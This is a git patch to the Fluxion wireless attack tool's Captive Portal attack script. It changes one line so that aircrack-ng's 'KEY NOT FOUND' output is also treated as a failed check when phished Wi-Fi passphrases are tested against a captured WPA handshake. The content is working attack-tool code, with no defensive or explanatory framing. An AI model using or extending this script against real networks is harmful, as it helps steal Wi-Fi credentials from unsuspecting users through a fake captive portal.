From f116e5481cf6b28805abc0688d451498e58bd7c3 Mon Sep 17 00:00:00 2001 From: strasharo Date: Mon, 28 Jan 2019 00:38:54 +0200 Subject: [PATCH] fixes #618 --- attacks/Captive Portal/attack.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 22ba28d..050b374 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -919,8 +919,8 @@ while [ \$AuthenticatorState = \"running\" ]; do if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then - # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". - if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | grep -qi \"Passphrase not in\"; then + # Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\". + if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" sleep 1